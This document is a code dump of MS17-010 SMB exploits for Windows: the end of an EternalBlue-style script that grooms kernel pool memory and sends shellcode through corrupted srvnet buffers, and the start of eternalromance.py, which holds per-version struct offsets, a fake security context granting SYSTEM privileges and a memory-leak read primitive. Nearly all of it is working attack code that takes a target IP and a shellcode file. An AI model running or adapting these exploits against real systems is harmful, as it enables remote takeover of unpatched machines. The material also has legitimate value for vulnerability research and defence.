289 | 	sessionSetup['Parameters']['SessionKey']         = 0
290 | 	sessionSetup['Parameters']['SecurityBlobLength'] = 0  # this is OEMPasswordLen field in another format. 0 for NULL session
291 | 	# UnicodePasswordLen field is in Reserved for extended security format. 0 for NULL session
292 | 	sessionSetup['Parameters']['Capabilities']       = smb.SMB.CAP_EXTENDED_SECURITY  # can add other flags
293 | 
294 | 	sessionSetup['Data'] = pack('<H', reqSize) + '\x00'*20
295 | 	pkt.addCommand(sessionSetup)
296 | 
297 | 	conn.sendSMB(pkt)
298 | 	recvPkt = conn.recvSMB()
299 | 	if recvPkt.getNTStatus() == 0:
300 | 		print('SMB1 session setup allocate nonpaged pool success')
301 | 	else:
302 | 		print('SMB1 session setup allocate nonpaged pool failed')
303 | 	return conn
304 | 
305 | 
306 | # Note: impacket-0.9.15 struct has no ParameterDisplacement
307 | ############# SMB_COM_TRANSACTION2_SECONDARY (0x33)
308 | class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):
309 |     structure = (
310 |         ('TotalParameterCount','<H=0'),
311 |         ('TotalDataCount','<H'),
312 |         ('ParameterCount','<H=0'),
313 |         ('ParameterOffset','<H=0'),
314 |         ('ParameterDisplacement','<H=0'),
315 |         ('DataCount','<H'),
316 |         ('DataOffset','<H'),
317 |         ('DataDisplacement','<H=0'),
318 |         ('FID','<H=0'),
319 |     )
320 | 
321 | def send_trans2_second(conn, tid, data, displacement):
322 | 	pkt = smb.NewSMBPacket()
323 | 	pkt['Tid'] = tid
324 | 
325 | 	# assume no params
326 | 
327 | 	transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)
328 | 	transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()
329 | 	transCommand['Data'] = smb.SMBTransaction2Secondary_Data()
330 | 
331 | 	transCommand['Parameters']['TotalParameterCount'] = 0
332 | 	transCommand['Parameters']['TotalDataCount'] = len(data)
333 | 
334 | 	fixedOffset = 32+3+18
335 | 	transCommand['Data']['Pad1'] = ''
336 | 
337 | 	transCommand['Parameters']['ParameterCount'] = 0
338 | 	transCommand['Parameters']['ParameterOffset'] = 0
339 | 
340 | 	if len(data) > 0:
341 | 		pad2Len = (4 - fixedOffset % 4) % 4
342 | 		transCommand['Data']['Pad2'] = '\xFF' * pad2Len
343 | 	else:
344 | 		transCommand['Data']['Pad2'] = ''
345 | 		pad2Len = 0
346 | 
347 | 	transCommand['Parameters']['DataCount'] = len(data)
348 | 	transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len
349 | 	transCommand['Parameters']['DataDisplacement'] = displacement
350 | 
351 | 	transCommand['Data']['Trans_Parameters'] = ''
352 | 	transCommand['Data']['Trans_Data'] = data
353 | 	pkt.addCommand(transCommand)
354 | 
355 | 	conn.sendSMB(pkt)
356 | 
357 | 
358 | def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):
359 | 	# Here is another bug in MS17-010.
360 | 	# To call transaction subcommand, normally a client need to use correct SMB commands as documented in
361 | 	#   https://msdn.microsoft.com/en-us/library/ee441514.aspx
362 | 	# If a transaction message is larger than SMB message (MaxBufferSize in session parameter), a client 
363 | 	#   can use *_SECONDARY command to send transaction message. When sending a transaction completely with
364 | 	#   *_SECONDARY command, a server uses the last command that complete the transaction.
365 | 	# For example:
366 | 	# - if last command is SMB_COM_NT_TRANSACT_SECONDARY, a server executes subcommand as NT_TRANSACT_*.
367 | 	# - if last command is SMB_COM_TRANSACTION2_SECONDARY, a server executes subcommand as TRANS2_*.
368 | 	#
369 | 	# Without MS17-010 patch, a client can mix a transaction command if TID, PID, UID, MID are the same.
370 | 	# For example:
371 | 	# - a client start transaction with SMB_COM_NT_TRANSACT command
372 | 	# - a client send more transaction data with SMB_COM_NT_TRANSACT_SECONDARY and SMB_COM_TRANSACTION2_SECONDARY
373 | 	# - a client sned last transactino data with SMB_COM_TRANSACTION2_SECONDARY
374 | 	# - a server executes transaction subcommand as TRANS2_* (first 2 bytes of Setup field)
375 | 	
376 | 	# From https://msdn.microsoft.com/en-us/library/ee442192.aspx, a maximum data size for sending a transaction 
377 | 	#   with SMB_COM_TRANSACTION2 is 65535 because TotalDataCount field is USHORT
378 | 	# While a maximum data size for sending a transaction with SMB_COM_NT_TRANSACT is >65536 because TotalDataCount
379 | 	#   field is ULONG (see https://msdn.microsoft.com/en-us/library/ee441534.aspx).
380 | 	# Note: a server limit SetupCount+TotalParameterCount+TotalDataCount to 0x10400 (in SrvAllocationTransaction)
381 | 	
382 | 	pkt = smb.NewSMBPacket()
383 | 	pkt['Tid'] = tid
384 | 
385 | 	command = pack('<H', setup)
386 | 	
387 | 	# Use SMB_COM_NT_TRANSACT because we need to send data >65535 bytes to trigger the bug.
388 | 	transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)
389 | 	transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()
390 | 	transCommand['Parameters']['MaxSetupCount'] = 1
391 | 	transCommand['Parameters']['MaxParameterCount'] = len(param)
392 | 	transCommand['Parameters']['MaxDataCount'] = 0
393 | 	transCommand['Data'] = smb.SMBTransaction2_Data()
394 | 
395 | 	transCommand['Parameters']['Setup'] = command
396 | 	transCommand['Parameters']['TotalParameterCount'] = len(param)
397 | 	transCommand['Parameters']['TotalDataCount'] = len(data)
398 | 
399 | 	fixedOffset = 32+3+38 + len(command)
400 | 	if len(param) > 0:
401 | 		padLen = (4 - fixedOffset % 4 ) % 4
402 | 		padBytes = '\xFF' * padLen
403 | 		transCommand['Data']['Pad1'] = padBytes
404 | 	else:
405 | 		transCommand['Data']['Pad1'] = ''
406 | 		padLen = 0
407 | 
408 | 	transCommand['Parameters']['ParameterCount'] = len(param)
409 | 	transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen
410 | 
411 | 	if len(data) > 0:
412 | 		pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4
413 | 		transCommand['Data']['Pad2'] = '\xFF' * pad2Len
414 | 	else:
415 | 		transCommand['Data']['Pad2'] = ''
416 | 		pad2Len = 0
417 | 
418 | 	transCommand['Parameters']['DataCount'] = firstDataFragmentSize
419 | 	transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len
420 | 
421 | 	transCommand['Data']['Trans_Parameters'] = param
422 | 	transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]
423 | 	pkt.addCommand(transCommand)
424 | 
425 | 	conn.sendSMB(pkt)
426 | 	conn.recvSMB() # must be success
427 | 	
428 | 	# Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data
429 | 	i = firstDataFragmentSize
430 | 	while i < len(data):
431 | 		# limit data to 4096 bytes per SMB message because this size can be used for all Windows version
432 | 		sendSize = min(4096, len(data) - i)
433 | 		if len(data) - i <= 4096:
434 | 			if not sendLastChunk:
435 | 				break
436 | 		send_trans2_second(conn, tid, data[i:i+sendSize], i)
437 | 		i += sendSize
438 | 	
439 | 	if sendLastChunk:
440 | 		conn.recvSMB()
441 | 	return i
442 | 
443 | 	
444 | # connect to target and send a large nbss size with data 0x80 bytes
445 | # this method is for allocating big nonpaged pool (no need to be same size as overflow buffer) on target
446 | # a nonpaged pool is allocated by srvnet.sys that started by useful struct (especially after overwritten)
447 | def createConnectionWithBigSMBFirst80(target):
448 | 	# https://msdn.microsoft.com/en-us/library/cc246496.aspx
449 | 	# Above link is about SMB2, but the important here is first 4 bytes.
450 | 	# If using wireshark, you will see the StreamProtocolLength is NBSS length.
451 | 	# The first 4 bytes is same for all SMB version. It is used for determine the SMB message length.
452 | 	#
453 | 	# After received first 4 bytes, srvnet.sys allocate nonpaged pool for receving SMB message.
454 | 	# srvnet.sys forwards this buffer to SMB message handler after receiving all SMB message.
455 | 	# Note: For Windows 7 and Windows 2008, srvnet.sys also forwards the SMB message to its handler when connection lost too.
456 | 	sk = socket.create_connection((target, 445))
457 | 	# For this exploit, use size is 0x11000
458 | 	pkt = '\x00' + '\x00' + pack('>H', 0xfff7)
459 | 	# There is no need to be SMB2 because we got code execution by corrupted srvnet buffer.
460 | 	# Also this is invalid SMB2 message.
461 | 	# I believe NSA exploit use SMB2 for hiding alert from IDS
462 | 	#pkt += '\xfeSMB' # smb2
463 | 	# it can be anything even it is invalid
464 | 	pkt += 'BAAD' # can be any
465 | 	pkt += '\x00'*0x7c
466 | 	sk.send(pkt)
467 | 	return sk
468 | 
469 | 
470 | def exploit(target, shellcode, numGroomConn):
471 | 	# force using smb.SMB for SMB1
472 | 	conn = smb.SMB(target, target)
473 | 
474 | 	# can use conn.login() for ntlmv2
475 | 	conn.login_standard('', '')
476 | 	server_os = conn.get_server_os()
477 | 	print('Target OS: '+server_os)
478 | 	if not (server_os.startswith("Windows 7 ") or (server_os.startswith("Windows Server ") and ' 2008 ' in server_os)):
479 | 		print('This exploit does not support this target')
480 | 		sys.exit()
481 | 	
482 | 
483 | 	tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
484 | 	
485 | 	# The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.
486 | 	# Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment
487 | 	progress = send_big_trans2(conn, tid, 0, feaList, '\x00'*30, 2000, False)
488 | 	# we have to know what size of NtFeaList will be created when last fragment is sent
489 | 
490 | 	# make sure server recv all payload before starting allocate big NonPaged
491 | 	#sendEcho(conn, tid, 'a'*12)
492 | 
493 | 	# create buffer size NTFEA_SIZE-0x1000 at server
494 | 	# this buffer MUST NOT be big enough for overflown buffer
495 | 	allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010)
496 | 	
497 | 	# groom nonpaged pool
498 | 	# when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one
499 | 	srvnetConn = []
500 | 	for i in range(numGroomConn):
501 | 		sk = createConnectionWithBigSMBFirst80(target)
502 | 		srvnetConn.append(sk)
503 | 
504 | 	# create buffer size NTFEA_SIZE at server
505 | 	# this buffer will be replaced by overflown buffer
506 | 	holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10)
507 | 	# disconnect allocConn to free buffer
508 | 	# expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer
509 | 	allocConn.get_socket().close()
510 | 
511 | 	# hope one of srvnetConn is next to holeConn
512 | 	for i in range(5):
513 | 		sk = createConnectionWithBigSMBFirst80(target)
514 | 		srvnetConn.append(sk)
515 | 		
516 | 	# send echo again, all new 5 srvnet buffers should be created
517 | 	#sendEcho(conn, tid, 'a'*12)
518 | 	
519 | 	# remove holeConn to create hole for fea buffer
520 | 	holeConn.get_socket().close()
521 | 
522 | 	# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header
523 | 	send_trans2_second(conn, tid, feaList[progress:], progress)
524 | 	recvPkt = conn.recvSMB()
525 | 	retStatus = recvPkt.getNTStatus()
526 | 	# retStatus MUST be 0xc000000d (INVALID_PARAMETER) because of invalid fea flag
527 | 	if retStatus == 0xc000000d:
528 | 		print('good response status: INVALID_PARAMETER')
529 | 	else:
530 | 		print('bad response status: 0x{:08x}'.format(retStatus))
531 | 		
532 | 
533 | 	# one of srvnetConn struct header should be modified
534 | 	# a corrupted buffer will write recv data in designed memory address
535 | 	for sk in srvnetConn:
536 | 		sk.send(fake_recv_struct + shellcode)
537 | 
538 | 	# execute shellcode by closing srvnet connection
539 | 	for sk in srvnetConn:
540 | 		sk.close()
541 | 
542 | 	# nicely close connection (no need for exploit)
543 | 	conn.disconnect_tree(tid)
544 | 	conn.logoff()
545 | 	conn.get_socket().close()
546 | 
547 | 
548 | if len(sys.argv) < 3:
549 | 	print("{} <ip> <shellcode_file> [numGroomConn]".format(sys.argv[0]))
550 | 	sys.exit(1)
551 | 
552 | TARGET=sys.argv[1]
553 | numGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3])
554 | 
555 | fp = open(sys.argv[2], 'rb')
556 | sc = fp.read()
557 | fp.close()
558 | 
559 | print('shellcode size: {:d}'.format(len(sc)))
560 | print('numGroomConn: {:d}'.format(numGroomConn))
561 | 
562 | exploit(TARGET, sc, numGroomConn)
563 | print('done')
564 | 


--------------------------------------------------------------------------------
/eternalromance.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | from impacket import smb, smbconnection
  3 | from mysmb import MYSMB
  4 | from struct import pack, unpack, unpack_from
  5 | import sys
  6 | import socket
  7 | import time
  8 | 
  9 | '''
 10 | MS17-010 exploit for Windows XP and later by sleepya
 11 | 
 12 | Note:
 13 | - The exploit should never crash a target (chance should be nearly 0%)
 14 | - The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
 15 | 
 16 | Tested on:
 17 | - Windows 2016 x64
 18 | - Windows 10 x64
 19 | - Windows 10 x86
 20 | - Windows 2012 R2 x64
 21 | - Windows 2008 R2 SP1 x64
 22 | - Windows 2008 SP1 x64
 23 | - Windows 2008 SP1 x86
 24 | - Windows 8.1 x64
 25 | - Windows 8.1 x86
 26 | - Windows 7 SP1 x86
 27 | - Windows 7 SP1 x64
 28 | - Windows 2003 SP2 x86
 29 | - Windows 2003 R2 SP2 x64
 30 | - Windows XP SP2 x64
 31 | - Windows XP SP3 x86
 32 | - Windows 2000 SP4 x86
 33 | 
 34 | '''
 35 | '''
 36 | A transaction with empty setup:
 37 | - it is allocated from paged pool (same as other transaction types) on Windows 7 and later
 38 | - it is allocated from private heap (RtlAllocateHeap()) with no on use it on Windows Vista and earlier
 39 | - no lookaside or caching method for allocating it
 40 | 
 41 | Note: method name is from NSA eternalromance
 42 | 
 43 | For Windows 7 and later, it is good to use matched pair method (one is large pool and another one is fit
 44 | for freed pool from large pool). Additionally, the exploit does the information leak to check transactions
 45 | alignment before doing OOB write. So this exploit should never crash a target.
 46 | 
 47 | For Windows Vista and earlier, matched pair method is impossible because we cannot allocate transaction size
 48 | smaller than PAGE_SIZE (Windows XP can but large page pool does not split the last page of allocation). But
 49 | a transaction with empty setup is allocated on private heap (it is created by RtlCreateHeap() on initialing server).
 50 | Only this transaction type uses this heap. Normally, no one uses this transaction type. So transactions alignment
 51 | in this private heap should be very easy and very reliable (fish in a barrel in NSA eternalromance). The drawback
 52 | of this method is we cannot do information leak to verify transactions alignment before OOB write.
 53 | So this exploit has a chance to crash target same as NSA eternalromance on Windows Vista and earlier.
 54 | '''
 55 | 
 56 | '''
 57 | Reversed from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext()
 58 | win7 x64
 59 | struct SrvSecContext {
 60 | 	DWORD xx1; // second WORD is size
 61 | 	DWORD refCnt;
 62 | 	PACCESS_TOKEN Token;  // 0x08
 63 | 	DWORD xx2;
 64 | 	BOOLEAN CopyOnOpen; // 0x14
 65 | 	BOOLEAN EffectiveOnly;
 66 | 	WORD xx3;
 67 | 	DWORD ImpersonationLevel; // 0x18
 68 | 	DWORD xx4;
 69 | 	BOOLEAN UsePsImpersonateClient; // 0x20
 70 | }
 71 | win2012 x64
 72 | struct SrvSecContext {
 73 | 	DWORD xx1; // second WORD is size
 74 | 	DWORD refCnt;
 75 | 	QWORD xx2;
 76 | 	QWORD xx3;
 77 | 	PACCESS_TOKEN Token;  // 0x18
 78 | 	DWORD xx4;
 79 | 	BOOLEAN CopyOnOpen; // 0x24
 80 | 	BOOLEAN EffectiveOnly;
 81 | 	WORD xx3;
 82 | 	DWORD ImpersonationLevel; // 0x28
 83 | 	DWORD xx4;
 84 | 	BOOLEAN UsePsImpersonateClient; // 0x30
 85 | }
 86 | 
 87 | SrvImpersonateSecurityContext() is used in Windows Vista and later before doing any operation as logged on user.
 88 | It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. 
 89 | From https://msdn.microsoft.com/en-us/library/windows/hardware/ff551907(v=vs.85).aspx, if Token is NULL,
 90 | PsImperonateClient() ends the impersonation. Even there is no impersonation, the PsImperonateClient() returns
 91 | STATUS_SUCCESS when Token is NULL.
 92 | If we can overwrite Token to NULL and UsePsImpersonateClient to true, a running thread will use primary token (SYSTEM)
 93 | to do all SMB operations.
 94 | Note: fake Token might be possible, but NULL token is much easier.
 95 | '''
 96 | ##########################
 97 | # info for modify session security context
 98 | ###########################
 99 | WIN7_64_SESSION_INFO = {
100 | 	'SESSION_SECCTX_OFFSET': 0xa0,
101 | 	'SESSION_ISNULL_OFFSET': 0xba,
102 | 	'FAKE_SECCTX': pack('<IIQQIIB', 0x28022a, 1, 0, 0, 2, 0, 1),
103 | 	'SECCTX_SIZE': 0x28,
104 | }
105 | 
106 | WIN7_32_SESSION_INFO = {
107 | 	'SESSION_SECCTX_OFFSET': 0x80,
108 | 	'SESSION_ISNULL_OFFSET': 0x96,
109 | 	'FAKE_SECCTX': pack('<IIIIIIB', 0x1c022a, 1, 0, 0, 2, 0, 1),
110 | 	'SECCTX_SIZE': 0x1c,
111 | }
112 | 
113 | # win8+ info
114 | WIN8_64_SESSION_INFO = {
115 | 	'SESSION_SECCTX_OFFSET': 0xb0,
116 | 	'SESSION_ISNULL_OFFSET': 0xca,
117 | 	'FAKE_SECCTX': pack('<IIQQQQIIB', 0x38022a, 1, 0, 0, 0, 0, 2, 0, 1),
118 | 	'SECCTX_SIZE': 0x38,
119 | }
120 | 
121 | WIN8_32_SESSION_INFO = {
122 | 	'SESSION_SECCTX_OFFSET': 0x88,
123 | 	'SESSION_ISNULL_OFFSET': 0x9e,
124 | 	'FAKE_SECCTX': pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
125 | 	'SECCTX_SIZE': 0x24,
126 | }
127 | 
128 | # win 2003 (xp 64 bit is win 2003)
129 | WIN2K3_64_SESSION_INFO = {
130 | 	'SESSION_ISNULL_OFFSET': 0xba,
131 | 	'SESSION_SECCTX_OFFSET': 0xa0,  # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
132 | 	'SECCTX_PCTXTHANDLE_OFFSET': 0x10,  # PCtxtHandle is at offset 0x8 but only upperPart is needed
133 | 	'PCTXTHANDLE_TOKEN_OFFSET': 0x40,
134 | 	'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
135 | 	'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
136 | }
137 | 
138 | WIN2K3_32_SESSION_INFO = {
139 | 	'SESSION_ISNULL_OFFSET': 0x96,
140 | 	'SESSION_SECCTX_OFFSET': 0x80,  # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
141 | 	'SECCTX_PCTXTHANDLE_OFFSET': 0xc,  # PCtxtHandle is at offset 0x8 but only upperPart is needed
142 | 	'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
143 | 	'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
144 | 	'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
145 | }
146 | 
147 | # win xp
148 | WINXP_32_SESSION_INFO = {
149 | 	'SESSION_ISNULL_OFFSET': 0x94,
150 | 	'SESSION_SECCTX_OFFSET': 0x84,  # PCtxtHandle is at offset 0x80 but only upperPart is needed
151 | 	'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
152 | 	'TOKEN_USER_GROUP_CNT_OFFSET': 0x4c,
153 | 	'TOKEN_USER_GROUP_ADDR_OFFSET': 0x68,
154 | }
155 | 
156 | WIN2K_32_SESSION_INFO = {
157 | 	'SESSION_ISNULL_OFFSET': 0x94,
158 | 	'SESSION_SECCTX_OFFSET': 0x84,  # PCtxtHandle is at offset 0x80 but only upperPart is needed
159 | 	'PCTXTHANDLE_TOKEN_OFFSET': 0x24,
160 | 	'TOKEN_USER_GROUP_CNT_OFFSET': 0x3c,
161 | 	'TOKEN_USER_GROUP_ADDR_OFFSET': 0x58,
162 | }
163 | 
164 | ###########################
165 | # info for exploitation
166 | ###########################
167 | # for windows 2008+
168 | WIN7_32_TRANS_INFO = {
169 | 	'TRANS_SIZE' : 0xa0,  # struct size
170 | 	'TRANS_FLINK_OFFSET' : 0x18,
171 | 	'TRANS_INPARAM_OFFSET' : 0x40,
172 | 	'TRANS_OUTPARAM_OFFSET' : 0x44,
173 | 	'TRANS_INDATA_OFFSET' : 0x48,
174 | 	'TRANS_OUTDATA_OFFSET' : 0x4c,
175 | 	'TRANS_PARAMCNT_OFFSET' : 0x58,
176 | 	'TRANS_TOTALPARAMCNT_OFFSET' : 0x5c,
177 | 	'TRANS_FUNCTION_OFFSET' : 0x72,
178 | 	'TRANS_MID_OFFSET' : 0x80,
179 | }
180 | 
181 | WIN7_64_TRANS_INFO = {
182 | 	'TRANS_SIZE' : 0xf8,  # struct size
183 | 	'TRANS_FLINK_OFFSET' : 0x28,
184 | 	'TRANS_INPARAM_OFFSET' : 0x70,
185 | 	'TRANS_OUTPARAM_OFFSET' : 0x78,
186 | 	'TRANS_INDATA_OFFSET' : 0x80,
187 | 	'TRANS_OUTDATA_OFFSET' : 0x88,
188 | 	'TRANS_PARAMCNT_OFFSET' : 0x98,
189 | 	'TRANS_TOTALPARAMCNT_OFFSET' : 0x9c,
190 | 	'TRANS_FUNCTION_OFFSET' : 0xb2,
191 | 	'TRANS_MID_OFFSET' : 0xc0,
192 | }
193 | 
194 | WIN5_32_TRANS_INFO = {
195 | 	'TRANS_SIZE' : 0x98,  # struct size
196 | 	'TRANS_FLINK_OFFSET' : 0x18,
197 | 	'TRANS_INPARAM_OFFSET' : 0x3c,
198 | 	'TRANS_OUTPARAM_OFFSET' : 0x40,
199 | 	'TRANS_INDATA_OFFSET' : 0x44,
200 | 	'TRANS_OUTDATA_OFFSET' : 0x48,
201 | 	'TRANS_PARAMCNT_OFFSET' : 0x54,
202 | 	'TRANS_TOTALPARAMCNT_OFFSET' : 0x58,
203 | 	'TRANS_FUNCTION_OFFSET' : 0x6e,
204 | 	'TRANS_PID_OFFSET' : 0x78,
205 | 	'TRANS_MID_OFFSET' : 0x7c,
206 | }
207 | 
208 | WIN5_64_TRANS_INFO = {
209 | 	'TRANS_SIZE' : 0xe0,  # struct size
210 | 	'TRANS_FLINK_OFFSET' : 0x28,
211 | 	'TRANS_INPARAM_OFFSET' : 0x68,
212 | 	'TRANS_OUTPARAM_OFFSET' : 0x70,
213 | 	'TRANS_INDATA_OFFSET' : 0x78,
214 | 	'TRANS_OUTDATA_OFFSET' : 0x80,
215 | 	'TRANS_PARAMCNT_OFFSET' : 0x90,
216 | 	'TRANS_TOTALPARAMCNT_OFFSET' : 0x94,
217 | 	'TRANS_FUNCTION_OFFSET' : 0xaa,
218 | 	'TRANS_PID_OFFSET' : 0xb4,
219 | 	'TRANS_MID_OFFSET' : 0xb8,
220 | }
221 | 
222 | X86_INFO = {
223 | 	'ARCH' : 'x86',
224 | 	'PTR_SIZE' : 4,
225 | 	'PTR_FMT' : 'I',
226 | 	'FRAG_TAG_OFFSET' : 12,
227 | 	'POOL_ALIGN' : 8,
228 | 	'SRV_BUFHDR_SIZE' : 8,
229 | }
230 | 
231 | X64_INFO = {
232 | 	'ARCH' : 'x64',
233 | 	'PTR_SIZE' : 8,
234 | 	'PTR_FMT' : 'Q',
235 | 	'FRAG_TAG_OFFSET' : 0x14,
236 | 	'POOL_ALIGN' : 0x10,
237 | 	'SRV_BUFHDR_SIZE' : 0x10,
238 | }
239 | 
240 | def merge_dicts(*dict_args):
241 | 	result = {}
242 | 	for dictionary in dict_args:
243 | 		result.update(dictionary)
244 | 	return result
245 | 
246 | OS_ARCH_INFO = {
247 | 	# for Windows Vista, 2008, 7 and 2008 R2
248 | 	'WIN7': {
249 | 		'x86': merge_dicts(X86_INFO, WIN7_32_TRANS_INFO, WIN7_32_SESSION_INFO),
250 | 		'x64': merge_dicts(X64_INFO, WIN7_64_TRANS_INFO, WIN7_64_SESSION_INFO),
251 | 	},
252 | 	# for Windows 8 and later
253 | 	'WIN8': {
254 | 		'x86': merge_dicts(X86_INFO, WIN7_32_TRANS_INFO, WIN8_32_SESSION_INFO),
255 | 		'x64': merge_dicts(X64_INFO, WIN7_64_TRANS_INFO, WIN8_64_SESSION_INFO),
256 | 	},
257 | 	'WINXP': {
258 | 		'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WINXP_32_SESSION_INFO),
259 | 		'x64': merge_dicts(X64_INFO, WIN5_64_TRANS_INFO, WIN2K3_64_SESSION_INFO),
260 | 	},
261 | 	'WIN2K3': {
262 | 		'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K3_32_SESSION_INFO),
263 | 		'x64': merge_dicts(X64_INFO, WIN5_64_TRANS_INFO, WIN2K3_64_SESSION_INFO),
264 | 	},
265 | 	'WIN2K': {
266 | 		'x86': merge_dicts(X86_INFO, WIN5_32_TRANS_INFO, WIN2K_32_SESSION_INFO),
267 | 	},
268 | }
269 | 
270 | 
271 | TRANS_NAME_LEN = 4
272 | HEAP_HDR_SIZE = 8  # heap chunk header size
273 | 
274 | 
275 | def calc_alloc_size(size, align_size):
276 | 	return (size + align_size - 1) & ~(align_size-1)
277 | 
278 | def wait_for_request_processed(conn):
279 | 	#time.sleep(0.05)
280 | 	# send echo is faster than sleep(0.05) when connection is very good
281 | 	conn.send_echo('a')
282 | 
283 | def find_named_pipe(conn):
284 | 	pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ]
285 | 
286 | 	tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
287 | 	found_pipe = None
288 | 	for pipe in pipes:
289 | 		try:
290 | 			fid = conn.nt_create_andx(tid, pipe)
291 | 			conn.close(tid, fid)
292 | 			found_pipe = pipe
293 | 		except smb.SessionError as e:
294 | 			pass
295 | 
296 | 	conn.disconnect_tree(tid)
297 | 	return found_pipe
298 | 
299 | 
300 | special_mid = 0
301 | extra_last_mid = 0
302 | def reset_extra_mid(conn):
303 | 	global extra_last_mid, special_mid
304 | 	special_mid = (conn.next_mid() & 0xff00) - 0x100
305 | 	extra_last_mid = special_mid
306 | 
307 | def next_extra_mid():
308 | 	global extra_last_mid
309 | 	extra_last_mid += 1
310 | 	return extra_last_mid
311 | 
312 | 
313 | # Borrow 'groom' and 'bride' word from NSA tool
314 | # GROOM_TRANS_SIZE includes transaction name, parameters and data
315 | # Note: the GROOM_TRANS_SIZE size MUST be multiple of 16 to make FRAG_TAG_OFFSET valid
316 | GROOM_TRANS_SIZE = 0x5010
317 | 
318 | def leak_frag_size(conn, tid, fid):
319 | 	# this method can be used on Windows Vista/2008 and later
320 | 	# leak "Frag" pool size and determine target architecture
321 | 	info = {}
322 | 
323 | 	# A "Frag" pool is placed after the large pool allocation if last page has some free space left.
324 | 	# A "Frag" pool size (on 64-bit) is 0x10 or 0x20 depended on Windows version.
325 | 	# To make exploit more generic, exploit does info leak to find a "Frag" pool size.
326 | 	# From the leak info, we can determine the target architecture too.
327 | 	mid = conn.next_mid()
328 | 	req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
329 | 	req2 = conn.create_nt_trans_secondary_packet(mid, data='B'*276) # leak more 276 bytes
330 | 
331 | 	conn.send_raw(req1[:-8])
332 | 	conn.send_raw(req1[-8:]+req2)
333 | 	leakData = conn.recv_transaction_data(mid, 0x10d0+276)
334 | 	leakData = leakData[0x10d4:]  # skip parameters and its own input
335 | 	# Detect target architecture and calculate frag pool size
336 | 	if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
337 | 		print('Target is 32 bit')
338 | 		info['arch'] = 'x86'
339 | 		info['FRAG_POOL_SIZE'] = ord(leakData[ X86_INFO['FRAG_TAG_OFFSET']-2 ]) * X86_INFO['POOL_ALIGN']
340 | 	elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
341 | 		print('Target is 64 bit')
342 | 		info['arch'] = 'x64'
343 | 		info['FRAG_POOL_SIZE'] = ord(leakData[ X64_INFO['FRAG_TAG_OFFSET']-2 ]) * X64_INFO['POOL_ALIGN']
344 | 	else:
345 | 		print('Not found Frag pool tag in leak data')
346 | 		sys.exit()
347 | 
348 | 	print('Got frag size: 0x{:x}'.format(info['FRAG_POOL_SIZE']))
349 | 	return info
350 | 
351 | 
352 | def read_data(conn, info, read_addr, read_size):
353 | 	fmt = info['PTR_FMT']
354 | 	# modify trans2.OutParameter to leak next transaction and trans2.OutData to leak real data
355 | 	# modify trans2.*ParameterCount and trans2.*DataCount to limit data
356 | 	new_data = pack('<'+fmt*3, info['trans2_addr']+info['TRANS_FLINK_OFFSET'], info['trans2_addr']+0x200, read_addr)  # OutParameter, InData, OutData
357 | 	new_data += pack('<II', 0, 0)  # SetupCount, MaxSetupCount
358 | 	new_data += pack('<III', 8, 8, 8)  # ParamterCount, TotalParamterCount, MaxParameterCount
359 | 	new_data += pack('<III', read_size, read_size, read_size)  # DataCount, TotalDataCount, MaxDataCount
360 | 	new_data += pack('<HH', 0, 5)  # Category, Function (NT_RENAME)
361 | 	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=new_data, dataDisplacement=info['TRANS_OUTPARAM_OFFSET'])
362 | 
363 | 	# create one more transaction before leaking data
364 | 	# - next transaction can be used for arbitrary read/write after the current trans2 is done
365 | 	# - next transaction address is from TransactionListEntry.Flink value
366 | 	conn.send_nt_trans(5, param=pack('<HH', info['fid'], 0), totalDataCount=0x4300-0x20, totalParameterCount=0x1000)
367 | 
368 | 	# finish the trans2 to leak
369 | 	conn.send_nt_trans_secondary(mid=info['trans2_mid'])
370 | 	read_data = conn.recv_transaction_data(info['trans2_mid'], 8+read_size)
371 | 
